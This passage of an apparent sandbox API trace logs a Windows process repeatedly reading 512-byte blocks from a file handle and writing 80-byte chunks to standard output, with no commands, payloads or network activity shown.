[0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.127] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.127] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.128] GetFileType (hFile=0x4c) returned 0x1 [0107.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.128] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.128] GetFileType (hFile=0x4c) returned 0x1 [0107.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.128] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.128] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.128] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.128] GetFileType (hFile=0x4c) returned 0x1 [0107.128] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.128] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.128] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.128] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.128] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.128] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.128] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.129] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.129] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.129] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.129] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.129] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.129] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.130] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.130] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.130] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.130] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.130] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.130] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.134] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.134] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.134] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.134] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.134] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.134] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, 